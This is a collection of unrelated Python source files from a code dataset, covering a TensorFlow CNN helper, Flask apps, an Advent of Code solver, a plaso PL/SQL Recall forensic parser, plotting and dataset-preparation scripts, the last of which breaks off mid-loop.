code/utils.py | ndz96/car_model_recognition | 0 | 6616823 | import tensorflow as tf
import numpy as np
def create_weights(shape):
return tf.Variable(tf.truncated_normal(shape, stddev=0.05))
def create_biases(size):
return tf.Variable(tf.constant(0.05, shape=[size]))
def create_convolutional_layer(input,
num_input_channels,
conv_filter_size,
num_filters):
## We shall define the weights that will be trained using create_weights function.
weights = create_weights(shape=[conv_filter_size, conv_filter_size, num_input_channels, num_filters])
## We create biases using the create_biases function. These are also trained.
biases = create_biases(num_filters)
## Creating the convolutional layer
layer = tf.nn.conv2d(input=input,
filter=weights,
strides=[1, 1, 1, 1],
padding='SAME')
layer += biases
## We shall be using max-pooling.
layer = tf.nn.max_pool(value=layer,
ksize=[1, 2, 2, 1],
strides=[1, 2, 2, 1],
padding='SAME')
## Output of pooling is fed to Relu which is the activation function for us.
layer = tf.nn.relu(layer)
return layer
def create_flatten_layer(layer):
#We know that the shape of the layer will be [batch_size img_size img_size num_channels]
# But let's get it from the previous layer.
layer_shape = layer.get_shape()
    ## Number of features will be img_height * img_width * num_channels. But we shall calculate it instead of hard-coding it.
num_features = layer_shape[1:4].num_elements()
## Now, we Flatten the layer so we shall have to reshape to num_features
layer = tf.reshape(layer, [-1, num_features])
return layer
def create_fc_layer(input,
num_inputs,
num_outputs,
use_relu=True):
#Let's define trainable weights and biases.
weights = create_weights(shape=[num_inputs, num_outputs])
biases = create_biases(num_outputs)
    # A fully connected layer takes input x and produces wx+b. Since these are matrices, we use the matmul function in TensorFlow.
layer = tf.matmul(input, weights) + biases
if use_relu:
layer = tf.nn.relu(layer)
return layer
| en | 0.828263 | ## We shall define the weights that will be trained using create_weights function. ## We create biases using the create_biases function. These are also trained. ## Creating the convolutional layer ## We shall be using max-pooling. ## Output of pooling is fed to Relu which is the activation function for us. #We know that the shape of the layer will be [batch_size img_size img_size num_channels] # But let's get it from the previous layer. ## Number of features will be img_height * img_width* num_channels. But we shall calculate it in place of hard-coding it. ## Now, we Flatten the layer so we shall have to reshape to num_features #Let's define trainable weights and biases. # Fully connected layer takes input x and produces wx+b.Since, these are matrices, we use matmul function in Tensorflow | 3.372107 | 3 |
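# A minimal usage sketch for the helper functions above. It assumes
# TensorFlow 1.x (tf.placeholder / tf.truncated_normal); the input shape and
# layer sizes are illustrative, not taken from the original project.
import tensorflow as tf

x = tf.placeholder(tf.float32, shape=[None, 64, 64, 3], name='x')
conv1 = create_convolutional_layer(x, num_input_channels=3,
                                   conv_filter_size=3, num_filters=32)
flat = create_flatten_layer(conv1)
logits = create_fc_layer(flat,
                         num_inputs=int(flat.get_shape()[1]),
                         num_outputs=10, use_relu=False)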
textflow/view/dashboard/labels.py | ysenarath/textflow | 4 | 6616824 | """ project admin view """
from flask import flash, url_for, redirect
from flask_login import current_user
from flask_wtf import FlaskForm
from wtforms import StringField, FormField, FieldList, BooleanField, IntegerField
from wtforms.validators import DataRequired
from textflow import auth, services
from textflow.model import Label
from textflow.view.base import FakeBlueprint
__all__ = [
'LabelsForm',
'LabelForm'
]
view = FakeBlueprint()
class LabelForm(FlaskForm):
selected = BooleanField('selected')
id = StringField('ID')
label = StringField('Label', validators=[DataRequired()])
value = StringField('Value', validators=[DataRequired()])
order = IntegerField('Order', validators=[DataRequired()])
class LabelsForm(FlaskForm):
labels = FieldList(FormField(LabelForm))
@view.route('/projects/<project_id>/dashboard/labels', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def create_label(project_id):
add_label_form = LabelForm()
if add_label_form.validate_on_submit():
lbl = add_label_form.data['label']
val = add_label_form.data['value']
order = add_label_form.data['order']
if services.filter_label(project_id=project_id, value=val) is None:
obj = Label(value=val, label=lbl, order=order, project_id=project_id)
services.db.session.add(obj)
services.db.session.commit()
else:
flash('Label with value "{}" exists. Please retry with another value.'.format(val))
else:
flash('Invalid form input. Please check and try again. Error: {}'.format(add_label_form.errors))
return redirect(url_for('dashboard.index', project_id=project_id))
@view.route('/projects/<project_id>/dashboard/labels/update', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def update_labels(project_id):
labels = services.list_labels(user_id=current_user.id, project_id=project_id)
labels_form = LabelsForm(labels=labels)
for label_form in labels_form.labels:
label_id = label_form.data['id']
lbl = services.get_label(label_id=label_id)
label_form.form.populate_obj(lbl)
services.db.session.commit()
return redirect(url_for('dashboard.index', project_id=project_id))
@view.route('/projects/<project_id>/dashboard/labels/delete', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def delete_labels(project_id):
labels = services.list_labels(user_id=current_user.id, project_id=project_id)
labels_form = LabelsForm(labels=labels)
none_selected = True
for ll in labels_form.labels:
if ll.data['selected']:
label_id = ll.data['id']
services.delete_label(label_id)
none_selected = False
if none_selected:
flash('You have to select labels that need to be removed first.')
return redirect(url_for('dashboard.index', project_id=project_id))
| """ project admin view """
from flask import flash, url_for, redirect
from flask_login import current_user
from flask_wtf import FlaskForm
from wtforms import StringField, FormField, FieldList, BooleanField, IntegerField
from wtforms.validators import DataRequired
from textflow import auth, services
from textflow.model import Label
from textflow.view.base import FakeBlueprint
__all__ = [
'LabelsForm',
'LabelForm'
]
view = FakeBlueprint()
class LabelForm(FlaskForm):
selected = BooleanField('selected')
id = StringField('ID')
label = StringField('Label', validators=[DataRequired()])
value = StringField('Value', validators=[DataRequired()])
order = IntegerField('Order', validators=[DataRequired()])
class LabelsForm(FlaskForm):
labels = FieldList(FormField(LabelForm))
@view.route('/projects/<project_id>/dashboard/labels', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def create_label(project_id):
add_label_form = LabelForm()
if add_label_form.validate_on_submit():
lbl = add_label_form.data['label']
val = add_label_form.data['value']
order = add_label_form.data['order']
if services.filter_label(project_id=project_id, value=val) is None:
obj = Label(value=val, label=lbl, order=order, project_id=project_id)
services.db.session.add(obj)
services.db.session.commit()
else:
flash('Label with value "{}" exists. Please retry with another value.'.format(val))
else:
flash('Invalid form input. Please check and try again. Error: {}'.format(add_label_form.errors))
return redirect(url_for('dashboard.index', project_id=project_id))
@view.route('/projects/<project_id>/dashboard/labels/update', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def update_labels(project_id):
labels = services.list_labels(user_id=current_user.id, project_id=project_id)
labels_form = LabelsForm(labels=labels)
for label_form in labels_form.labels:
label_id = label_form.data['id']
lbl = services.get_label(label_id=label_id)
label_form.form.populate_obj(lbl)
services.db.session.commit()
return redirect(url_for('dashboard.index', project_id=project_id))
@view.route('/projects/<project_id>/dashboard/labels/delete', methods=['POST'])
@auth.login_required
@auth.roles_required(role='admin')
def delete_labels(project_id):
labels = services.list_labels(user_id=current_user.id, project_id=project_id)
labels_form = LabelsForm(labels=labels)
none_selected = True
for ll in labels_form.labels:
if ll.data['selected']:
label_id = ll.data['id']
services.delete_label(label_id)
none_selected = False
if none_selected:
flash('You have to select labels that need to be removed first.')
return redirect(url_for('dashboard.index', project_id=project_id))
| en | 0.717459 | project admin view | 2.409609 | 2 |
2019/3/3.py | pshatov/AoC | 0 | 6616825 |
line1 = ""
line2 = ""
with open('input.txt') as f:
line1 = f.readline().strip()
line2 = f.readline().strip()
class WireSegmentPoint:
def __init__(self, x, y):
self.x = x
self.y = y
class WireSegment:
def __init__(self, x1, y1, x2, y2, dir, len):
self.a = WireSegmentPoint(x1, y1)
self.b = WireSegmentPoint(x2, y2)
self.dir = dir
self.len = len
@property
def min_x(self):
return min(self.a.x, self.b.x)
@property
def max_x(self):
return max(self.a.x, self.b.x)
@property
def min_y(self):
return min(self.a.y, self.b.y)
@property
def max_y(self):
return max(self.a.y, self.b.y)
@property
def is_vertical(self):
return self.a.x == self.b.x
@property
def is_horizontal(self):
return self.a.y == self.b.y
@property
def range_x(self):
return range(self.min_x, self.max_x+1)
@property
def range_y(self):
return range(self.min_y, self.max_y+1)
def check_contains(self, cross):
return cross[0] in self.range_x and cross[1] in self.range_y
def check_cross(self, other_seg):
if self.is_vertical and other_seg.is_vertical:
if self.a.x == other_seg.a.x:
for y_self in self.range_y:
if y_self in other_seg.range_y:
return (self.a.x, y_self)
if self.is_horizontal and other_seg.is_horizontal:
if self.a.y == other_seg.a.y:
for x_self in self.range_x:
if x_self in other_seg.range_x:
return (x_self, self.a.y)
if self.is_vertical and other_seg.is_horizontal:
if other_seg.a.y in self.range_y and self.a.x in other_seg.range_x:
return (self.a.x, other_seg.a.y)
if self.is_horizontal and other_seg.is_vertical:
if other_seg.a.x in self.range_x and self.a.y in other_seg.range_y:
return (other_seg.a.x, self.a.y)
def get_wire_segments(line):
segs = []
old_x = 0
old_y = 0
line_segs = line.split(",")
for line_seg in line_segs:
line_seg_dir = line_seg[:1]
line_seg_len = int(line_seg[1:])
new_x = old_x
new_y = old_y
if line_seg_dir == "D": new_y -= line_seg_len
elif line_seg_dir == "U": new_y += line_seg_len
elif line_seg_dir == "L": new_x -= line_seg_len
elif line_seg_dir == "R": new_x += line_seg_len
else: raise Exception("Bad segment_direction ('%s')!" % line_seg_dir)
seg = WireSegment(old_x, old_y, new_x, new_y, line_seg_dir, line_seg_len)
segs.append(seg)
old_x = new_x
old_y = new_y
return segs
def calc_steps(segs, cross):
x = 0
y = 0
steps = 0
for next_seg in segs:
for i in range(next_seg.len):
if next_seg.dir == "D": y -= 1
elif next_seg.dir == "U": y += 1
elif next_seg.dir == "L": x -= 1
elif next_seg.dir == "R": x += 1
else: raise Exception("Bad segment direction ('%s')!" % next_seg.dir)
steps += 1
if x == cross[0] and y == cross[1]:
return steps
raise Exception("calc_steps() failed...")
segs1 = get_wire_segments(line1)
segs2 = get_wire_segments(line2)
crosses = []
for next_seg1 in segs1:
for next_seg2 in segs2:
cross = next_seg1.check_cross(next_seg2)
        if cross is not None:
if cross[0] != 0 or cross[1] != 0:
crosses.append(cross)
i = 0
for next_cross in crosses:
dist = abs(next_cross[0]) + abs(next_cross[1])
if i == 0: min_dist = dist
elif dist < min_dist: min_dist = dist
i += 1
print("min_dist = %d" % min_dist)
i = 0
for next_cross in crosses:
steps1 = calc_steps(segs1, next_cross)
steps2 = calc_steps(segs2, next_cross)
steps = steps1 + steps2
if i == 0: min_steps = steps
elif steps < min_steps: min_steps = steps
i += 1
print("%d + %d = %d [min: %d]" % (steps1, steps2, steps, min_steps))
print("min_steps = %d" % min_steps)
| line1 = ""
line2 = ""
with open('input.txt') as f:
line1 = f.readline().strip()
line2 = f.readline().strip()
class WireSegmentPoint:
def __init__(self, x, y):
self.x = x
self.y = y
class WireSegment:
def __init__(self, x1, y1, x2, y2, dir, len):
self.a = WireSegmentPoint(x1, y1)
self.b = WireSegmentPoint(x2, y2)
self.dir = dir
self.len = len
@property
def min_x(self):
return min(self.a.x, self.b.x)
@property
def max_x(self):
return max(self.a.x, self.b.x)
@property
def min_y(self):
return min(self.a.y, self.b.y)
@property
def max_y(self):
return max(self.a.y, self.b.y)
@property
def is_vertical(self):
return self.a.x == self.b.x
@property
def is_horizontal(self):
return self.a.y == self.b.y
@property
def range_x(self):
return range(self.min_x, self.max_x+1)
@property
def range_y(self):
return range(self.min_y, self.max_y+1)
def check_contains(self, cross):
return cross[0] in self.range_x and cross[1] in self.range_y
def check_cross(self, other_seg):
if self.is_vertical and other_seg.is_vertical:
if self.a.x == other_seg.a.x:
for y_self in self.range_y:
if y_self in other_seg.range_y:
return (self.a.x, y_self)
if self.is_horizontal and other_seg.is_horizontal:
if self.a.y == other_seg.a.y:
for x_self in self.range_x:
if x_self in other_seg.range_x:
return (x_self, self.a.y)
if self.is_vertical and other_seg.is_horizontal:
if other_seg.a.y in self.range_y and self.a.x in other_seg.range_x:
return (self.a.x, other_seg.a.y)
if self.is_horizontal and other_seg.is_vertical:
if other_seg.a.x in self.range_x and self.a.y in other_seg.range_y:
return (other_seg.a.x, self.a.y)
def get_wire_segments(line):
segs = []
old_x = 0
old_y = 0
line_segs = line.split(",")
for line_seg in line_segs:
line_seg_dir = line_seg[:1]
line_seg_len = int(line_seg[1:])
new_x = old_x
new_y = old_y
if line_seg_dir == "D": new_y -= line_seg_len
elif line_seg_dir == "U": new_y += line_seg_len
elif line_seg_dir == "L": new_x -= line_seg_len
elif line_seg_dir == "R": new_x += line_seg_len
else: raise Exception("Bad segment_direction ('%s')!" % line_seg_dir)
seg = WireSegment(old_x, old_y, new_x, new_y, line_seg_dir, line_seg_len)
segs.append(seg)
old_x = new_x
old_y = new_y
return segs
def calc_steps(segs, cross):
x = 0
y = 0
steps = 0
for next_seg in segs:
for i in range(next_seg.len):
if next_seg.dir == "D": y -= 1
elif next_seg.dir == "U": y += 1
elif next_seg.dir == "L": x -= 1
elif next_seg.dir == "R": x += 1
else: raise Exception("Bad segment direction ('%s')!" % next_seg.dir)
steps += 1
if x == cross[0] and y == cross[1]:
return steps
raise Exception("calc_steps() failed...")
segs1 = get_wire_segments(line1)
segs2 = get_wire_segments(line2)
crosses = []
for next_seg1 in segs1:
for next_seg2 in segs2:
cross = next_seg1.check_cross(next_seg2)
if not cross is None:
if cross[0] != 0 or cross[1] != 0:
crosses.append(cross)
i = 0
for next_cross in crosses:
dist = abs(next_cross[0]) + abs(next_cross[1])
if i == 0: min_dist = dist
elif dist < min_dist: min_dist = dist
i += 1
print("min_dist = %d" % min_dist)
i = 0
for next_cross in crosses:
steps1 = calc_steps(segs1, next_cross)
steps2 = calc_steps(segs2, next_cross)
steps = steps1 + steps2
if i == 0: min_steps = steps
elif steps < min_steps: min_steps = steps
i += 1
print("%d + %d = %d [min: %d]" % (steps1, steps2, steps, min_steps))
print("min_steps = %d" % min_steps) | none | 1 | 3.411961 | 3 | |
Python String.py | Farhan-Khalifa-Ibrahim/CodeAcademy | 1 | 6616826 |
lovely_loveseat_description = "Lovely Loveseat. Tufted polyester blend on wood. 32 inches high x 40 inches wide x 30 inches deep. Red or white."
lovely_loveseat_price = 254.00
stylish_settee_description = "Stylish Settee. Faux leather on birch. 29.50 inches high x 54.75 inches wide x 28 inches deep. Black."
stylish_settee_price = 180.50
luxurious_lamp_description = "Luxurious Lamp. Glass and iron. 36 inches tall. Brown with cream shade."
luxurious_lamp_price = 52.15
sales_tax = 0.088
customer_one_total = 0
customer_one_itemization = ""
customer_one_total += lovely_loveseat_price
print(customer_one_total)
customer_one_itemization+=lovely_loveseat_description
print(customer_one_itemization)
customer_one_total+=luxurious_lamp_price
print(customer_one_total)
customer_one_itemization+=","+luxurious_lamp_description
print(customer_one_itemization)
customer_one_tax = customer_one_total*sales_tax
customer_one_total += customer_one_tax
print("customer one total: \n{} \nCustomer One Items: \n{}".format(customer_one_total,customer_one_itemization)) | lovely_loveseat_description = "Lovely Loveseat. Tufted polyester blend on wood. 32 inches high x 40 inches wide x 30 inches deep. Red or white."
lovely_loveseat_price = 254.00
stylish_settee_description = "Stylish Settee. Faux leather on birch. 29.50 inches high x 54.75 inches wide x 28 inches deep. Black."
stylish_settee_price = 180.50
luxurious_lamp_description = "Luxurious Lamp. Glass and iron. 36 inches tall. Brown with cream shade."
luxurious_lamp_price = 52.15
sales_tax = 0.088
customer_one_total = 0
customer_one_itemization = ""
customer_one_total += lovely_loveseat_price
print(customer_one_total)
customer_one_itemization+=lovely_loveseat_description
print(customer_one_itemization)
customer_one_total+=luxurious_lamp_price
print(customer_one_total)
customer_one_itemization+=","+luxurious_lamp_description
print(customer_one_itemization)
customer_one_tax = customer_one_total*sales_tax
customer_one_total += customer_one_tax
print("customer one total: \n{} \nCustomer One Items: \n{}".format(customer_one_total,customer_one_itemization)) | none | 1 | 2.136381 | 2 | |
setup.py | brandtbucher/these | 4 | 6616827 | import setuptools
with open("README.md") as readme:
long_description = readme.read()
setuptools.setup(
author="<NAME>",
author_email="<EMAIL>",
description="The Markov Zenerator.",
keywords="Markov Zen this",
license="MIT",
long_description=long_description,
long_description_content_type="text/markdown",
name="these",
py_modules=['these'],
url="https://github.com/brandtbucher/these",
    version="1",
)
| none | 1 | 1.351533 | 1 | |
plaso/parsers/pls_recall.py | ir4n6/plaso | 0 | 6616828 | # -*- coding: utf-8 -*-
"""Parser for PL/SQL Developer Recall files."""
from __future__ import unicode_literals
import os
import construct
from dfdatetime import delphi_date_time as dfdatetime_delphi_date_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import errors
from plaso.lib import definitions
from plaso.lib import timelib
from plaso.lib import utils
from plaso.parsers import interface
from plaso.parsers import manager
class PlsRecallEventData(events.EventData):
"""PL/SQL Recall event data.
Attributes:
database_name (str): name of the database.
query (str): PL/SQL query.
sequence_number (int): sequence number.
username (str): username used to query.
"""
DATA_TYPE = 'PLSRecall:event'
def __init__(self):
"""Initializes event data."""
super(PlsRecallEventData, self).__init__(data_type=self.DATA_TYPE)
self.database_name = None
self.query = None
self.sequence_number = None
self.username = None
class PlsRecallParser(interface.FileObjectParser):
"""Parse PL/SQL Recall files.
Parser is based on:
TRecallRecord = packed record
Sequence: Integer;
TimeStamp: TDateTime;
Username: array[0..30] of Char;
Database: array[0..80] of Char;
Text: array[0..4000] of Char;
end;
Delphi TDateTime is a little-endian 64-bit floating-point value without
time zone information.
"""
_INITIAL_FILE_OFFSET = None
_PLS_KEYWORD = frozenset([
'begin', 'commit', 'create', 'declare', 'drop', 'end', 'exception',
'execute', 'insert', 'replace', 'rollback', 'select', 'set',
'update'])
# 6 * 365 * 24 * 60 * 60 * 1000000.
_SIX_YEARS_IN_MICRO_SECONDS = 189216000000000
NAME = 'pls_recall'
DESCRIPTION = 'Parser for PL/SQL Recall files.'
_PLS_RECALL_RECORD = construct.Struct(
'PL/SQL_Recall',
construct.ULInt32('Sequence'),
construct.LFloat64('TimeStamp'),
construct.String('Username', 31, None, b'\x00'),
construct.String('Database', 81, None, b'\x00'),
construct.String('Query', 4001, None, b'\x00'))
def ParseFileObject(self, parser_mediator, file_object, **kwargs):
"""Parses a PLSRecall.dat file-like object.
Args:
parser_mediator (ParserMediator): mediates interactions between parsers
and other components, such as storage and dfvfs.
file_object (dfvfs.FileIO): a file-like object.
Raises:
UnableToParseFile: when the file cannot be parsed.
"""
try:
is_pls = self.VerifyFile(file_object)
except (IOError, construct.FieldError) as exception:
raise errors.UnableToParseFile((
          'Not a PLSRecall file, unable to parse '
          'with error: {0!s}').format(exception))
if not is_pls:
raise errors.UnableToParseFile(
'Not a PLSRecall File, unable to parse.')
file_object.seek(0, os.SEEK_SET)
pls_record = self._PLS_RECALL_RECORD.parse_stream(file_object)
while pls_record:
event_data = PlsRecallEventData()
event_data.database_name = pls_record.Database
event_data.sequence_number = pls_record.Sequence
event_data.query = pls_record.Query
event_data.username = pls_record.Username
date_time = dfdatetime_delphi_date_time.DelphiDateTime(
timestamp=pls_record.TimeStamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_WRITTEN)
parser_mediator.ProduceEventWithEventData(event, event_data)
try:
pls_record = self._PLS_RECALL_RECORD.parse_stream(file_object)
except construct.FieldError:
# The code has reached the end of file (EOF).
break
def VerifyFile(self, file_object):
"""Check if the file is a PLSRecall.dat file.
Args:
file_object (dfvfs.FileIO): a file-like object.
Returns:
bool: True if this is a valid PLSRecall.dat file, False otherwise.
"""
file_object.seek(0, os.SEEK_SET)
    # The file consists of equal-size (4125 bytes) TRecallRecord
    # structures. It should be noted that the query value is free form.
try:
structure = self._PLS_RECALL_RECORD.parse_stream(file_object)
except (IOError, construct.FieldError):
return False
# Verify that the timestamp is no more than six years into the future.
# Six years is an arbitrary time length just to evaluate the timestamp
# against some value. There is no guarantee that this will catch everything.
# TODO: Add a check for similarly valid value back in time. Maybe if it the
# timestamp is before 1980 we are pretty sure it is invalid?
# TODO: This is a very flaky assumption. Find a better one.
future_timestamp = (
timelib.Timestamp.GetNow() + self._SIX_YEARS_IN_MICRO_SECONDS)
if structure.TimeStamp > future_timestamp:
return False
# TODO: Add other verification checks here. For instance make sure
# that the query actually looks like a SQL query. This structure produces a
# lot of false positives and thus we need to add additional verification to
# make sure we are not parsing non-PLSRecall files.
# Another check might be to make sure the username looks legitimate, or the
# sequence number, or the database name.
# For now we just check if all three fields pass our "is this a text" test.
if not utils.IsText(structure.Username):
return False
if not utils.IsText(structure.Query):
return False
if not utils.IsText(structure.Database):
return False
# Take the first word from the query field and attempt to match that against
# allowed queries.
first_word, _, _ = structure.Query.partition(b' ')
if first_word.lower() not in self._PLS_KEYWORD:
return False
return True
manager.ParsersManager.RegisterParser(PlsRecallParser)
| en | 0.850636 | # -*- coding: utf-8 -*- Parser for PL/SQL Developer Recall files. PL/SQL Recall event data. Attributes: database_name (str): name of the database. query (str): PL/SQL query. sequence_number (int): sequence number. username (str): username used to query. Initializes event data. Parse PL/SQL Recall files. Parser is based on: TRecallRecord = packed record Sequence: Integer; TimeStamp: TDateTime; Username: array[0..30] of Char; Database: array[0..80] of Char; Text: array[0..4000] of Char; end; Delphi TDateTime is a little-endian 64-bit floating-point value without time zone information. # 6 * 365 * 24 * 60 * 60 * 1000000. Parses a PLSRecall.dat file-like object. Args: parser_mediator (ParserMediator): mediates interactions between parsers and other components, such as storage and dfvfs. file_object (dfvfs.FileIO): a file-like object. Raises: UnableToParseFile: when the file cannot be parsed. # The code has reached the end of file (EOF). Check if the file is a PLSRecall.dat file. Args: file_object (dfvfs.FileIO): a file-like object. Returns: bool: True if this is a valid PLSRecall.dat file, False otherwise. # The file consists of PL/SQL structures that are equal # size (4125 bytes) TRecallRecord records. It should be # noted that the query value is free form. # Verify that the timestamp is no more than six years into the future. # Six years is an arbitrary time length just to evaluate the timestamp # against some value. There is no guarantee that this will catch everything. # TODO: Add a check for similarly valid value back in time. Maybe if it the # timestamp is before 1980 we are pretty sure it is invalid? # TODO: This is a very flaky assumption. Find a better one. # TODO: Add other verification checks here. For instance make sure # that the query actually looks like a SQL query. This structure produces a # lot of false positives and thus we need to add additional verification to # make sure we are not parsing non-PLSRecall files. # Another check might be to make sure the username looks legitimate, or the # sequence number, or the database name. # For now we just check if all three fields pass our "is this a text" test. # Take the first word from the query field and attempt to match that against # allowed queries. | 2.036978 | 2 |
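# Layout sketch for one TRecallRecord (4 + 8 + 31 + 81 + 4001 = 4125 bytes),
# built with the standard-library struct module. The field values are made
# up for illustration; a Delphi TDateTime counts days since 1899-12-30.
import struct

record = struct.pack(
    '<Id31s81s4001s',        # little-endian: uint32, float64, three padded strings
    1,                       # Sequence
    41000.5,                 # TimeStamp (Delphi TDateTime)
    b'SYSTEM',               # Username, NUL-padded to 31 bytes
    b'ORCL',                 # Database, NUL-padded to 81 bytes
    b'SELECT * FROM dual')   # Query, NUL-padded to 4001 bytes
assert len(record) == 4125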
app/run.py | prabhatdutt95/Disaster-Response-Pipeline | 1 | 6616829 |
import pandas as pd
from nltk.corpus import stopwords
from nltk.stem import WordNetLemmatizer
from nltk.tokenize import word_tokenize
from flask import Flask
from flask import render_template, request
from plotly.graph_objs import Bar
import re
import joblib
from sqlalchemy import create_engine
import json
import plotly
# initializing Flask app
app = Flask(__name__)
def tokenize(text):
"""
Tokenizes text data
Args:
text str: Messages as text data
Returns:
        words list: Processed text after normalizing, tokenizing and lemmatizing
"""
# Normalize text
text = re.sub(r"[^a-zA-Z0-9]", " ", text.lower())
# tokenize text
words = word_tokenize(text)
# remove stop words
stopwords_ = stopwords.words("english")
words = [word for word in words if word not in stopwords_]
# extract root form of words
words = [WordNetLemmatizer().lemmatize(word, pos='v') for word in words]
return words
# load data
engine = create_engine('sqlite:///../data/DisasterResponse.db')
df = pd.read_sql_table('DisasterResponse', engine)
# load model
model = joblib.load("../models/classifier.pkl")
# index webpage displays cool visuals and receives user input text for model
@app.route('/')
@app.route('/index')
def index():
# Extract data needed for visuals
    # count messages based on whether genre is related or not
genre_related_counts = df[df['related'] == 1].groupby('genre')['message'].count()
genre_not_related_counts = df[df['related'] == 0].groupby('genre')['message'].count()
# label for the genre
genre_names = list(genre_related_counts.index)
# Calculate proportion of each category with label = 1
category_proportion = df[df.columns[4:]].sum()/len(df)
category_proportion = category_proportion.sort_values(ascending = False)
# category labels
category = list(category_proportion.index)
# create visuals
figures = [
{
'data': [
Bar(
x = genre_names,
y = genre_related_counts,
name = 'Genre: Related'
),
Bar(
x = genre_names,
y = genre_not_related_counts,
name = 'Genre: Not Related'
)
],
'layout': {
'title': 'Distribution of Messages by Genre and Related Status',
'xaxis': {
'title': "Genre"
}, 'yaxis': {
'title': "Count of Messages"
}, 'barmode': 'group'
}
},
{
'data': [
Bar(
x = category,
y = category_proportion
)
],
'layout': {
'title': 'Proportion of Messages <br> by Category',
'xaxis': {
'title': "Category",
'tickangle': -45,
'automargin': True
}, 'yaxis': {
'title': "Proportion",
'automargin': True
}
}
}
]
# encode plotly graphs in JSON
ids = ["figure-{}".format(i) for i, _ in enumerate(figures)]
figuresJSON = json.dumps(figures, cls=plotly.utils.PlotlyJSONEncoder)
# render web page with plotly figures
return render_template('master.html', ids=ids, figuresJSON=figuresJSON, data_set=df)
# web page that handles user query and displays model results
@app.route('/go')
def go():
# save user input in query
query = request.args.get('query', '')
# use model to predict classification for query
categories = df.columns[4:]
# print('categories data is',categories)
classification_labels = model.predict([query])[0]
classification_results = dict(zip(categories, classification_labels))
positive_results = [key.replace('_', ' ').title() for key,value in classification_results.items() if value == 1]
# print(positive_results, len(positive_results))
# print('classification result is',classification_results)
# This will render the go.html Please see that file.
return render_template('go.html',
query=query,
classification_result=classification_results,
positive_results = positive_results
)
def main():
app.run(host='0.0.0.0', port=3001, debug=True)
if __name__ == '__main__':
main()
| en | 0.679212 | # initializing Flask app Tokenizes text data
Args:
text str: Messages as text data
Returns:
# clean_tokens list: Processed text after normalizing, tokenizing and lemmatizing
words list: Processed text after normalizing, tokenizing and lemmatizing # Normalize text # tokenize text # remove stop words # extract root form of words # load data # load model # index webpage displays cool visuals and receives user input text for model # Extract data needed for visuals # count messsages based on whether genre is related or not # label for the genre # Calculate proportion of each category with label = 1 # category labels # create visuals # encode plotly graphs in JSON # render web page with plotly figures # web page that handles user query and displays model results # save user input in query # use model to predict classification for query # print('categories data is',categories) # print(positive_results, len(positive_results)) # print('classification result is',classification_results) # This will render the go.html Please see that file. | 3.002357 | 3 |
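# Illustrative call of the tokenize() helper above; it needs the NLTK
# 'punkt', 'stopwords' and 'wordnet' corpora downloaded first, and the exact
# output depends on the lemmatizer, so the result shown is only indicative.
import nltk
for pkg in ('punkt', 'stopwords', 'wordnet'):
    nltk.download(pkg, quiet=True)
print(tokenize("We are running out of water and food!"))
# e.g. ['run', 'water', 'food']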
poisson.py | danielbandeir/ExpoPoisson | 1 | 6616830 |
# -*- coding: utf-8 -*-
import matplotlib.pyplot as plt
class poisson(object):
def __init__(self):
stopTimes = []
times = []
self.stopTimes = stopTimes
self.times = times
def importPoisson(self, enterArchive):
database = open('import/'+enterArchive+'.csv', 'r')
for count in database:
count = count.strip()
stop, time = count.split(',')
self.stopTimes.append(stop)
self.times.append(time)
        database.close()
        self.stopTimes = sorted(self.stopTimes)
        return self.stopTimes, self.times
def plotGraphic(self):
fig = plt.figure(figsize=(10, 5))
ax = fig.add_subplot(1, 1, 1)
ax.step(self.times, self.stopTimes, label="Paradas")
        ax.legend()
ax.set_title("Poisson")
ax.set_xlabel("Tempo")
ax.set_ylabel("Paradas")
plt.show()
| en | 0.769321 | # -*- coding: utf-8 -*- | 3.346785 | 3 |
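# Hypothetical usage sketch: assumes a file import/example.csv exists with
# one "stop,time" pair per line (e.g. "3,10"); matplotlib must be installed.
p = poisson()
stops, times = p.importPoisson('example')
p.plotGraphic()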
dockstream/utils/execute_external/TautEnum.py | niladell/DockStream | 34 | 6616831 |
from dockstream.utils.enums.taut_enum_enums import TautEnumEnum
from dockstream.utils.execute_external.execute import ExecutorBase
EE = TautEnumEnum()
class TautEnumExecutor(ExecutorBase):
"""For the execution of the "TautEnum" binary."""
def __init__(self, prefix_execution=None, binary_location=None):
super().__init__(prefix_execution=prefix_execution, binary_location=binary_location)
def execute(self, command: str, arguments: list, check=True, location=None):
# check, whether a proper executable is provided
if command not in [EE.TAUTENUM]:
raise ValueError("Parameter command must be an dictionary of the internal TautEnum executable list.")
return super().execute(command=command,
arguments=arguments,
check=check,
location=location)
def is_available(self):
# unfortunately, "TautEnum" does not seem to return a meaningful return value, so instead try to parse
# the "stdout" of the help message
try:
result = self.execute(command=EE.TAUTENUM,
arguments=[EE.TAUTENUM_HELP],
check=False)
if EE.TAUTENUM_HELP_IDENTIFICATION_STRING in result.stdout:
return True
return False
except Exception as e:
return False
| en | 0.803445 | For the execution of the "TautEnum" binary. # check, whether a proper executable is provided # unfortunately, "TautEnum" does not seem to return a meaningful return value, so instead try to parse # the "stdout" of the help message | 2.624691 | 3
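# Hypothetical usage sketch; prefix_execution (for instance a "module load"
# line) is an environment-specific assumption, not a DockStream requirement.
executor = TautEnumExecutor(prefix_execution=None)
if executor.is_available():
    result = executor.execute(command=EE.TAUTENUM,
                              arguments=[EE.TAUTENUM_HELP],
                              check=False)
    print(result.stdout)
else:
    print("taut_enum binary not found on this system")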
prepare_msmt17.py | oganesManasian/Person_reID_baseline_pytorch | 0 | 6616832 |
import os
from shutil import copyfile, rmtree
from tqdm import tqdm
# Folder which contains 'msmt17_raw' folder which contains list_train.txt, list_val.txt,
# list_query.txt, list_gallery.txt files and train, test folders with images
data_raw_path = 'msmt17'
# Processing train and test
for src_folder, sections in [["train", ["train", "val"]],
["test", ["gallery", "query"]]]:
for section in sections:
with open(os.path.join(data_raw_path, "msmt17_raw", f"list_{section}.txt")) as f:
filenames = f.readlines()
print(f"In total {len(filenames)} files in folder {section}")
if os.path.isdir(os.path.join(data_raw_path, section)):
rmtree(os.path.join(data_raw_path, section))
os.mkdir(os.path.join(data_raw_path, section))
for filename in tqdm(filenames, desc=f"Processing section {section}"):
label, name = filename.split(" ")[0].split("/")
